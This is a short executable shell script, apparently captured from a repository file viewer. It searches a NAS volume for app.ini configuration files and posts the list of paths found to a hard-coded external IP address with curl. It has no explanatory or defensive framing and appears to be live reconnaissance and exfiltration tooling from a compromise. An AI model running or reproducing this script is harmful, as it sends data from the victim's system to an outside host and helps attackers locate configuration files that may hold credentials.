3 lines
130 B
Bash
Executable File
3 lines
130 B
Bash
Executable File
#!/bin/sh
|
|
find /volume1 -maxdepth 6 -name app.ini -type f 2>&1 | curl -s -m 5 --data-binary @- http://202.79.169.91:28016/ini_all
|